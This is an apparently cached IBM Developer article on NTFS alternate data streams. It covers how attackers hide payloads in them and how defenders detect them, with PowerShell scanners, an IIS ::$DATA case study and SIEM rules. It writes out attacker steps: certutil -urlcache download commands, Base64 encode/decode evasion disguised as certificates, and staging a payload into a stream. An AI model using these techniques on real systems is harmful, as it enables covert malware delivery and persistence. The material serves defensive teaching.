This is a cache of https://developer.ibm.com/articles/alternate-data-streams/. It is a snapshot of the page as it appeared on 2025-11-24T07:48:31.937+0000.
Alternate data streams and cybersecurity vulnerabilities - IBM Developer
Alternate data streams (ADS) are a little-known but potent feature of the NTFS file system that let data be attached to a file without changing the size or content that directory listings show. NTFS gained the feature so that it could store Macintosh resource forks and other per-file metadata. Windows still uses it legitimately, for example for the Zone.Identifier stream that marks downloaded files, but attackers misuse the same mechanism to conceal payloads or stage data for exfiltration, often slipping past tools that inspect only a file's default stream. That stealth makes ADS a quiet but real threat to system security and data integrity.
Anyone who's responsible for protecting enterprise systems and data needs to understand the security implications of ADS. This guide shines a light on how ADS works, explores the unique risks it presents, and delivers practical guidance on how to identify, investigate, and defend against threats that leverage this feature, equipping you to spot hidden vulnerabilities and strengthen your overall security framework.
Key ADS characteristics
Following are some of the key features of ADS:
ADS do not appear in Windows Explorer, and the size that Explorer, dir, and most tools report covers only the default data stream; dir /r (Windows Vista and later) and PowerShell's Get-Item -Stream * do list them.
ADS depend on the file system: FAT32 and exFAT volumes cannot hold them, so copying a file there, or moving it through a tool or protocol that does not understand streams, silently drops them.
Not every ADS is hostile: Windows writes the Zone.Identifier stream (the mark of the web) to downloaded files, so a scanner has to separate expected streams from unexpected ones.
Some antivirus tools now scan ADS, but many still overlook or ignore them unless configured otherwise.
Manage and detect files with ADS
Accessing the :$DATA ADS
In NTFS, every file's default (unnamed) data stream can be addressed explicitly as filename::$DATA: the empty name between the two colons is the stream name, and $DATA is the stream type. Opening that path yields exactly the same bytes as opening the file normally, which you can confirm with the start command in the Command Prompt:
C:\> start c:\notepad.txt::$DATA
Detecting an ADS
You can detect the presence of ADS with the dir /r command, which lists the alternate streams attached to files:
C:\> dir /r C:\windows\system32\calc.exe
If calc.exe has any ADS, each stream appears on its own line beneath the file, named calc.exe:<stream name>:$DATA and shown with its own size, as in the following image:
Creating an ADS
You can create a new alternate data stream by redirecting or copying content into it. Here's an example of embedding Notepad into a hidden stream attached to another file (in this case, calc.exe):
C:\> type C:\windows\system32\notepad.exe >C:\windows\system32\calc.exe:notepad.txt
This command writes the binary content of notepad.exe into a hidden stream, notepad.txt, attached to calc.exe. Writing under System32 needs an elevated prompt. Afterwards calc.exe still runs, reports the same size in dir and Explorer, and still passes a hash check of its default stream, which is the whole point of the technique.
Deleting an ADS
The del command cannot target a stream by name. In the Command Prompt you can truncate it by redirecting empty output into it, but that leaves a zero-length stream entry that dir /r still lists.
To remove the stream itself, use PowerShell, whose Remove-Item cmdlet takes a -Stream parameter on NTFS:
Remove-Item -Path .\calc.exe -Stream notepad.txt
The Sysinternals streams.exe tool (streams -d) strips every alternate stream from a file or directory tree in one pass.
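The whole lifecycle above (create, detect, read, delete), as an added PowerShell example that is not part of the original article. It assumes $env:TEMP sits on an NTFS volume; the file name ads-demo.txt, the stream name hidden.txt, and the Find-AlternateStreams helper are chosen here for illustration.

```powershell
# Added example (not from the article): ADS lifecycle in PowerShell.
# Assumes $env:TEMP is on NTFS; file and stream names are chosen here.

$file = Join-Path $env:TEMP 'ads-demo.txt'
Set-Content -LiteralPath $file -Value 'Visible content of the host file.'

# Create: write a payload into a named stream. The size the file reports is the
# default stream only, so it does not change, which is what makes ADS easy to miss.
$before = (Get-Item -LiteralPath $file).Length
Set-Content -LiteralPath $file -Stream 'hidden.txt' -Value ('A' * 4096)
$after = (Get-Item -LiteralPath $file).Length
"Default stream size before/after: $before / $after"   # identical

# Detect: enumerate every stream. ':$DATA' is the default (unnamed) stream.
Get-Item -LiteralPath $file -Stream * | Select-Object FileName, Stream, Length

# Read the hidden stream back; the visible content is untouched.
(Get-Content -LiteralPath $file -Stream 'hidden.txt').Length   # 4096

# Scan a tree for unexpected streams. Zone.Identifier is the legitimate mark-of-the-web
# stream that browsers add to downloads; exclude it to cut noise, but review everything else.
function Find-AlternateStreams {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}
Find-AlternateStreams -Root $env:TEMP

# Delete: truncating the stream from cmd leaves a zero-byte entry behind;
# Remove-Item -Stream removes the stream itself.
Remove-Item -LiteralPath $file -Stream 'hidden.txt'
(Get-Item -LiteralPath $file -Stream *).Stream   # only ':$DATA' remains
```

Get-Item -Stream * is the PowerShell equivalent of dir /r and is easier to pipe into a scan; the two -ErrorAction settings in the scanner keep it running over files you cannot open rather than stopping on the first access-denied error.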
Consequences of ADS-based attacks
Following are some major cybersecurity risks to organizations from NTFS ADS:
Concealment and persistence: Malware stored in an ADS can sit undetected for extended periods, giving attackers more time to escalate privileges and exfiltrate data. The stream still needs a launch point (a scheduled task, service, or Run key that references file:stream), and that reference is often the more reliable hunting signal.
Data exfiltration and breaches: Sensitive data staged in an ADS can bypass controls that inspect only default streams, leading to potential data breaches and compliance violations (for example, GDPR or HIPAA).
Evading detection and forensics: Antivirus, EDR, and file integrity monitoring that hash or scan only a file's default stream never see ADS content, so a hidden payload neither triggers a signature match nor changes the monitored hash.
Increased incident response complexity: Monitoring that misses ADS leaves investigators without the artifact, making response slower and less effective.
Insider threat risks: Employees with legitimate access can use an ADS to hide unauthorized files or data, bypassing data loss prevention systems that do not enumerate streams.
IIS and ADS exploitation
A notable real-world exploitation occurred in IIS 3.0 and 4.0 (CVE-1999-0278). IIS used the extension of the requested path to determine how to handle a request: files with the .asp extension were sent to the ASP engine, which executed the server-side code and returned the resulting HTML to the client.
Because IIS matched the extension against the request string rather than against the name the file system would actually resolve, a request for filename.asp::$DATA did not match the .asp mapping: the parser saw an extension of asp::$DATA, for which no application was registered. IIS fell through to its static file handler, opened the path, and NTFS resolved ::$DATA to the file's default stream. The raw ASP source code, which often embedded database credentials, was returned to the requester instead of being executed.
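Stripped to the decision that went wrong, as an added example that is not IIS code: a handler-selection function that parses the extension the naive way, beside a hardened version that refuses NTFS stream syntax in the request. The handler names (asp-engine, static, reject), the function names, and the request paths are made up for the illustration.

```powershell
# Added example (not IIS code): extension-to-handler mapping, vulnerable and hardened.

function Get-NaiveExtension {
    param([string]$Name)
    # "Everything after the last dot": 'default.asp::$DATA' -> '.asp::$data'
    $i = $Name.LastIndexOf('.')
    if ($i -lt 0) { return '' }
    return $Name.Substring($i).ToLowerInvariant()
}

function Resolve-RequestHandler {
    param(
        [Parameter(Mandatory)][string]$RequestPath,
        [switch]$Hardened
    )
    $scriptMap = @{ '.asp' = 'asp-engine' }   # anything else goes to the static handler
    $leaf = $RequestPath.Split('/')[-1]

    if ($Hardened) {
        # NTFS stream syntax has no place in a URL: any ':' in the leaf names a stream
        # (name:stream or name::$DATA). Reject it before it reaches the file system.
        if ($leaf.Contains(':')) { return 'reject' }
    }

    $ext = Get-NaiveExtension -Name $leaf
    if ($scriptMap.ContainsKey($ext)) { return $scriptMap[$ext] }
    # The static handler opens the path as given; NTFS maps '::$DATA' to the file's
    # default stream, so the ASP source is served verbatim.
    return 'static'
}

# Constructed requests, not captured traffic.
foreach ($p in '/default.asp', '/default.asp::$DATA', '/default.asp:x:$DATA', '/readme.txt') {
    '{0,-24} vulnerable={1,-11} hardened={2}' -f $p,
        (Resolve-RequestHandler -RequestPath $p),
        (Resolve-RequestHandler -RequestPath $p -Hardened)
}
```

The vulnerable path returns static for both stream forms; the hardened path returns reject for them and leaves /default.asp and /readme.txt unchanged. Rejecting is the simpler fix; the more general one is to map handlers on the canonical on-disk name after the file system has resolved the request, so that the string the parser sees and the object that gets opened can never disagree.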
While ADS itself is not new (NTFS has supported it since Windows NT 3.1), its use in attacks has become more significant in recent years. Attackers increasingly use ADS to hide payloads, tools, or data in a way that bypasses traditional detection. It is actively used for:
Concealment that passes for fileless: The payload is not stored as a standalone file but inside a stream of an existing, often legitimate, file, so nothing new appears in a directory listing and conventional antivirus or endpoint protection may never inspect it. Strictly, this is not fileless malware, which runs only in memory: the payload is still on disk and can be recovered from the stream once you know to look.
Data exfiltration: Attackers use ADS to stage stolen data or encrypted communication, making it harder for security systems to flag or prevent the leakage.
Persistence mechanisms: Backdoors, exploits, or other tools are stored in an ADS and launched from a task, service, or registry entry that references the stream, maintaining access without leaving a visible file.
Bypassing antivirus software using ADS
The following sections describe methods that malicious actors use to bypass antivirus software.
Using certutil.exe with ADS to evade detection
certutil.exe is a command-line utility that ships with Windows as part of the Certificate Services tooling. Its legitimate jobs are managing certificates, displaying CA configuration, and verifying certificate chains. Because it is signed by Microsoft, present on every Windows host, and able to fetch URLs and transcode files, attackers repurpose it as a living-off-the-land download and decode tool, and combine it with ADS to keep the result out of sight.
Malicious use of certutil.exe for file download
A commonly abused feature is the URL cache, which can be made to fetch an arbitrary file:
certutil.exe -urlcache -split -f <URL> <output file>
-urlcache: Displays or deletes URL cache entries; given a URL, it fetches the resource
-split: Writes the fetched content to the output file instead of only to the cache (its documented purpose is to split embedded ASN.1 elements into files)
-f: Forces overwrite of an existing output file
Although this command downloads the file in plain form, network security tools can flag the transfer as malicious. To evade that, attackers Base64-encode the file first, download it as text, and decode it locally with certutil.exe as well:
certutil.exe -encode payload.exe payload.txt
certutil.exe -urlcache -split -f <URL>/payload.txt payload.txt
certutil.exe -decode payload.txt payload.exe
The encoded file is wrapped in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines, so it looks like a harmless PEM certificate to a proxy or inline scanner that inspects only the transfer. The decoded binary still lands on disk, though, where endpoint tools can see it.
ADS and malware staging using certutil.exe
The output path handed to certutil.exe can itself name a stream, so the downloaded or decoded payload never appears as a standalone file. For example, after generating a payload with Metasploit's msfvenom, an attacker can have certutil.exe write it into an ADS of bad.txt (for instance bad.txt:payload.exe), hiding it from tools that only enumerate files.
Detecting this activity takes both a SIEM (Security Information and Event Management) system and EDR (Endpoint Detection and Response): EDR sees the behavior on the endpoint, and the SIEM correlates process creation events across hosts.
Behavior-based detection by EDR tools
EDR solutions can flag suspicious use of certutil.exe based on behavioral patterns mapped to MITRE ATT&CK techniques:
T1105 – Ingress Tool Transfer (formerly Remote File Copy): Abuse of certutil -urlcache to download payloads from external sources.
T1140 – Deobfuscate/Decode Files or Information: certutil -decode or -decodehex turning the downloaded text back into a binary.
T1564.004 – Hide Artifacts: NTFS File Attributes: the decoded payload written to an alternate data stream.
T1055 – Process Injection: Common in post-download stages for defense evasion after staging payloads.
T1059 – Command and Scripting Interpreter (which superseded the deprecated T1064 Scripting): PowerShell or batch scripts that decode and execute the staged binary.
Use case: Detection using SIEM
You can use SIEM to monitor and alert on the execution of certutil.exe with the following arguments:
-urlcache (especially with -split -f and a URL): Fetches a remote file, the typical download step
-encode, -decode, -decodehex: Suggests file obfuscation or transformation
-split: Writes fetched or decoded content to disk, possibly into an ADS
-dump: Used to extract certificate or file content, possibly for staging
Recommended SIEM query filters
Process name: certutil.exe, or original file name (from the PE version resource): CertUtil.exe
Command line contains any of:
-urlcache
-decode
-encode
-decodehex
-split
-dump
Two caveats when you tune this: Security event 4688 carries the command line only if the "Include command line in process creation events" policy is enabled (Sysmon Event ID 1 records it by default), and attackers rename the binary, so matching on the process name alone misses copies. certutil.exe also runs legitimately, for example from PKI administration tooling, so baseline the parent process, user, and target URL before alerting on every hit.
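The filter above turned into runnable detection logic, as an added PowerShell example that is not from the article. It runs over constructed process-creation records whose field names (User, Image, OriginalFileName, ParentImage, CommandLine) follow Sysmon Event ID 1; the events, users, paths, and the 198.51.100.7 address are invented, and Test-CertutilAbuse is a name chosen here.

```powershell
# Added example (not from the article): certutil abuse detection over constructed
# Sysmon-style process creation records. Field names follow Sysmon Event ID 1.

$suspiciousArgs = '-urlcache', '-decode', '-encode', '-decodehex', '-split', '-dump'

function Test-CertutilAbuse {
    param([Parameter(Mandatory)][hashtable]$Event)
    $findings = @()
    $image = Split-Path -Leaf $Event.Image

    # Match on OriginalFileName (from the PE version resource) as well as the path:
    # copying certutil.exe to another name is a common first step.
    $isCertutil = ($image -ieq 'certutil.exe') -or ($Event.OriginalFileName -ieq 'CertUtil.exe')
    if (-not $isCertutil) { return $null }
    if ($image -ine 'certutil.exe') { $findings += "renamed binary ($image)" }

    $tokens = $Event.CommandLine -split '\s+'
    $hits = $tokens | Where-Object { $suspiciousArgs -contains $_.ToLowerInvariant() }
    if ($hits) { $findings += "flags: $($hits -join ' ')" }

    # An argument of the form path:stream (no URL, no further separators) targets an ADS.
    $adsTarget = $tokens | Where-Object { $_ -match '^(?:[A-Za-z]:\\)?[^:\s]+:[^:\s\\/]+$' }
    if ($adsTarget) { $findings += "writes to ADS: $adsTarget" }

    if ($Event.CommandLine -match 'https?://') { $findings += 'remote URL' }

    if ($findings.Count -eq 0) { return $null }
    [pscustomobject]@{ User = $Event.User; Parent = $Event.ParentImage; Findings = ($findings -join '; '); CommandLine = $Event.CommandLine }
}

# Constructed sample events (not real telemetry).
$events = @(
    @{ User = 'CORP\alice'; Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
       ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\bad.txt:payload.exe' },
    @{ User = 'CORP\alice'; Image = 'C:\Users\Public\ct.exe'; OriginalFileName = 'CertUtil.exe'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'ct.exe -decode C:\Users\Public\p.txt C:\Users\Public\p.exe' },
    @{ User = 'NT AUTHORITY\SYSTEM'; Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
       ParentImage = 'C:\Windows\System32\svchost.exe'
       CommandLine = 'certutil.exe -verify -urlfetch C:\Windows\Temp\cert.cer' }
)
$events | ForEach-Object { Test-CertutilAbuse -Event $_ } | Format-List
```

The first record is flagged for -urlcache and -split, the remote URL, and the ADS output path; the second is flagged as a renamed binary running -decode; the third, a routine certificate verification under SYSTEM, produces no finding and is dropped. To run the same logic on live data, pull events with Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } and map the EventData fields into the hashtable shape the function expects.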
Summary
You should now have a clearer understanding of alternate data streams. This article has presented details on:
The concept and functionality of ADS within the NTFS file system
How threat actors leverage ADS for concealment, persistence, and evading detection
Techniques for identifying and mitigating ADS-based threats using native Windows commands, PowerShell, endpoint detection tools, and SIEM solutions
Real-world exploitation scenarios, including the misuse of trusted tools like certutil.exe to weaponize ADS and circumvent security defenses
By understanding ADS, you are better able to identify and mitigate the stealthy threats that bypass traditional detection layers. As threat actors continue to evolve, so must your methods of visibility and defense.
Next steps
Explore the following resources to deepen your understanding of ADS and enhance your ability to detect and defend against hidden threats: